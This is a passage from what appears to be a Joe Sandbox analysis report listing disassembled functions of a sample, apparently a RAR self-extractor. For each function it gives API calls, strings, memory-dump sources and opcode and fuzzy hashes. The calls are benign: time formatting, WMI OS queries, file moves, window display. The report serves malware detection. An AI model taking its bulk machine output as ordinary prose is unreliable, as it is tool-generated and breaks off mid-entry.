                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0031B615
                                                                                              • _swprintf.LIBCMT ref: 0031B640
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • _wcslen.LIBCMT ref: 0031B64A
                                                                                              • _swprintf.LIBCMT ref: 0031B6A0
                                                                                              • _wcslen.LIBCMT ref: 0031B6AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                                              • String ID: %u.%03u
                                                                                              • API String ID: 2956649372-1114938957
                                                                                              • Opcode ID: 70fc23cd38fb687dafd800c0cc8e491d31670358991d3a94646731ae0d16c3c9
                                                                                              • Instruction ID: 3c2b3b7910c87d40b8ac5b800152fdde59616bfcfd444d85724e9b9c0f81664f
                                                                                              • Opcode Fuzzy Hash: 70fc23cd38fb687dafd800c0cc8e491d31670358991d3a94646731ae0d16c3c9
                                                                                              • Instruction Fuzzy Hash: 7C2195B2A043006FD716EF65CC85D9BB7ECEBD8710F04492AF545DB241DB34EA4887A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BC2B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC3F
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0032BC50
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0032BC5E
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0032BC6C
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0032BC87
                                                                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0032BCAE
                                                                                              • _swprintf.LIBCMT ref: 0032BCD4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                                              • String ID: %s %s
                                                                                              • API String ID: 385609497-2939940506
                                                                                              • Opcode ID: 9b3965f5e2a8d30349a7f353731a078d7aff37c8de5bf3dd6ff4a3697462082e
                                                                                              • Instruction ID: 5f3ebbe309b3d38beb40a405b6820d082baaf329d6e36b4e646a9828775e975a
                                                                                              • Opcode Fuzzy Hash: 9b3965f5e2a8d30349a7f353731a078d7aff37c8de5bf3dd6ff4a3697462082e
                                                                                              • Instruction Fuzzy Hash: E821D6B654115CABDB22DFA1EC45EEF7BACFF1A704F050426FA05D6111EB20EA49CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00330ED0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0031C43F,0031C441,00000000,00000000,6BE19C46,00000001,00000000,00000000,0031C32C,?,?,?,0031C43F,ROOT\CIMV2), ref: 00330F59
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0031C43F,?,00000000,00000000,?,?,?,?,?,0031C43F), ref: 00330FD4
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00330FDF
                                                                                              • _com_issue_error.COMSUPP ref: 00331008
                                                                                              • _com_issue_error.COMSUPP ref: 00331012
                                                                                              • GetLastError.KERNEL32(80070057,6BE19C46,00000001,00000000,00000000,0031C32C,?,?,?,0031C43F,ROOT\CIMV2), ref: 00331017
                                                                                              • _com_issue_error.COMSUPP ref: 0033102A
                                                                                              • GetLastError.KERNEL32(00000000,?,0031C43F,ROOT\CIMV2), ref: 00331040
                                                                                              • _com_issue_error.COMSUPP ref: 00331053
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 1b0ceed0905a78cabca182e52b36243c540066ade633a68c3aae92a0f371ec66
                                                                                              • Instruction ID: c3ecbbe30ebd0c83858f27e4abcac682f4c7e2cf86929e75ca5b98f78b352ed3
                                                                                              • Opcode Fuzzy Hash: 1b0ceed0905a78cabca182e52b36243c540066ade633a68c3aae92a0f371ec66
                                                                                              • Instruction Fuzzy Hash: 484118B5A04305AFD716DF68DC85BAFBBB8EF49710F104229F405EB280DB75A940CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031C3F7 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 22149ba23b7113966ef524f95054e16e01e2c22c5c10380578ec85b773b39e0a
                                                                                              • Instruction ID: 4711c16165646bc1e793c5faa5c8926babdca732e2a435c7cd39b79e7c7f99be
                                                                                              • Opcode Fuzzy Hash: 22149ba23b7113966ef524f95054e16e01e2c22c5c10380578ec85b773b39e0a
                                                                                              • Instruction Fuzzy Hash: 65719D75A506199FDB1ADFA5CC94AFEB7B9FF4D310B010569E402EB2A0CB30AD41CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031A5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0031A5EE
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0031A611
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0031A630
                                                                                                • Part of subcall function 0031D6A7: _wcslen.LIBCMT ref: 0031D6AF
                                                                                                • Part of subcall function 00323316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,0031D523,00000000,.exe,?,?,00000800,?,?,?,00329E5C), ref: 0032332C
                                                                                              • _swprintf.LIBCMT ref: 0031A6CC
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0031A73B
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0031A77B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: f7c81afdb7db7b532703864f46f871c1652a6ee4ec82aa38773892a218c28b6a
                                                                                              • Instruction ID: 279204a35045f65e6caed3d01f4f43b5cbf1c1e27813b276da9658e97dd37b42
                                                                                              • Opcode Fuzzy Hash: f7c81afdb7db7b532703864f46f871c1652a6ee4ec82aa38773892a218c28b6a
                                                                                              • Instruction Fuzzy Hash: AA417E71901A286ACF26EBA0CC45EEFB37CBF59341F0804A5B545A7085EB359BC58F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00322538 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 0032254E
                                                                                                • Part of subcall function 0031C619: GetVersionExW.KERNEL32(?), ref: 0031C63E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00322571
                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00322583
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00322594
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003225A4
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003225B4
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003225EF
                                                                                              • __aullrem.LIBCMT ref: 00322699
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: f8aa1ce86612094b8e856c2c1535526eb17da9763e9361534f40f37340d9c7d4
                                                                                              • Instruction ID: be2b9a7c31d8320b3421b0d90559c0baa0d7e01eb7d31b8cfdd652849c179c9a
                                                                                              • Opcode Fuzzy Hash: f8aa1ce86612094b8e856c2c1535526eb17da9763e9361534f40f37340d9c7d4
                                                                                              • Instruction Fuzzy Hash: 964137B6508305AFC715DF65D880A6BFBE9FF88314F00892EF996C6210E774E549CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032AD1E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                              • API String ID: 176396367-3568243669
                                                                                              • Opcode ID: 809a86d818db8e33d3b3c14b737686928fb2d8823805918154ce5c2ae8e7c647
                                                                                              • Instruction ID: 3bd264c25a388eb2491823cafba96e10d76ac8906046e9e64a7d9e9a9b6df4e4
                                                                                              • Opcode Fuzzy Hash: 809a86d818db8e33d3b3c14b737686928fb2d8823805918154ce5c2ae8e7c647
                                                                                              • Instruction Fuzzy Hash: E451F576640B7393DB329A14A82177673E4DF64751F6A442BF9C08F581FA648D4282A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0034084D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00340FC2,00000000,00000000,00000000,00000000,00000000,?), ref: 0034088F
                                                                                              • __fassign.LIBCMT ref: 0034090A
                                                                                              • __fassign.LIBCMT ref: 00340925
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0034094B
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00340FC2,00000000,?,?,?,?,?,?,?,?,?,00340FC2,00000000), ref: 0034096A
                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00340FC2,00000000,?,?,?,?,?,?,?,?,?,00340FC2,00000000), ref: 003409A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: ca89dca517744516206adedbfe55b2e8606fd36ece161cf508e1432a725a1987
                                                                                              • Instruction ID: bd006542a75b133946b9695cdb5f1269d65140ea7ce7939a6866c2864188d88e
                                                                                              • Opcode Fuzzy Hash: ca89dca517744516206adedbfe55b2e8606fd36ece161cf508e1432a725a1987
                                                                                              • Instruction Fuzzy Hash: 17519971A002499FDB16CFA4DC45FEEBBF8EF09300F15411AE655EB292D730A951CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00333A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00333AC7
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00333ACF
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00333B58
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00333B83
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00333BD8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 82b4d221d371ed67e706edd3b54758e292a7ad9071369a6ead99231f8aed2768
                                                                                              • Instruction ID: 3d53a6f3e59a807da60d4217787283d4cbf8cfe5daed02ae580c5c7a7009a01e
                                                                                              • Opcode Fuzzy Hash: 82b4d221d371ed67e706edd3b54758e292a7ad9071369a6ead99231f8aed2768
                                                                                              • Instruction Fuzzy Hash: 3B41CF34A00208EFCF12DF69C8C1A9EBBB4AF45324F15C155E814AF392C772AA45CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032AEF5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 0032AF0E
                                                                                              • GetWindowRect.USER32(?,?), ref: 0032AF64
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 0032B001
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0032B009
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 0032B01F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: f0a4a46180fa30a0a4e4122dcc26f71012c5557961b97fd51ccdd7e328ed8864
                                                                                              • Instruction ID: 04beb86f0a551ea83751e16c9588fc08267c1c00c0adec42ea1b96b9fc5788c5
                                                                                              • Opcode Fuzzy Hash: f0a4a46180fa30a0a4e4122dcc26f71012c5557961b97fd51ccdd7e328ed8864
                                                                                              • Instruction Fuzzy Hash: 7C41EF72404724AFDB239F20ED48B6BBBECEB08701F554559F9899A052DBB4E844CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032A975 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: 13b83b83b445546caa00103c989ed3ef930f44429f28a36bd9d1057bda96ec3d
                                                                                              • Instruction ID: 3b9f548f53143e94fb2b214e400028cf5fcea8786aa0ce1c0cd6d004eeb7109d
                                                                                              • Opcode Fuzzy Hash: 13b83b83b445546caa00103c989ed3ef930f44429f28a36bd9d1057bda96ec3d
                                                                                              • Instruction Fuzzy Hash: D8315E72A44B1597D632AB54BC82B7673E4EF90720F11842FF9855B280FB50BD94C3A7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033DA64 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0033DA28: _free.LIBCMT ref: 0033DA51
                                                                                              • _free.LIBCMT ref: 0033DAB2
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 0033DABD
                                                                                              • _free.LIBCMT ref: 0033DAC8
                                                                                              • _free.LIBCMT ref: 0033DB1C
                                                                                              • _free.LIBCMT ref: 0033DB27
                                                                                              • _free.LIBCMT ref: 0033DB32
                                                                                              • _free.LIBCMT ref: 0033DB3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                              • Instruction ID: 78e51659f0a37a661feb208d323b2999452736d209d0592573248c26b2519bce
                                                                                              • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                              • Instruction Fuzzy Hash: DE119071A54B04BAD622BBB1DD87FCBB7ACAF14700F440C14B29AAE062DA74B5158751
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032F77A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0032F7F5,0032F758,0032F9F9), ref: 0032F791
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0032F7A7
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0032F7BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: 3c2f908b5ec4f75b6c61bfa7a870bd0776b119fbbfe2a353c2a03c4548d654d4
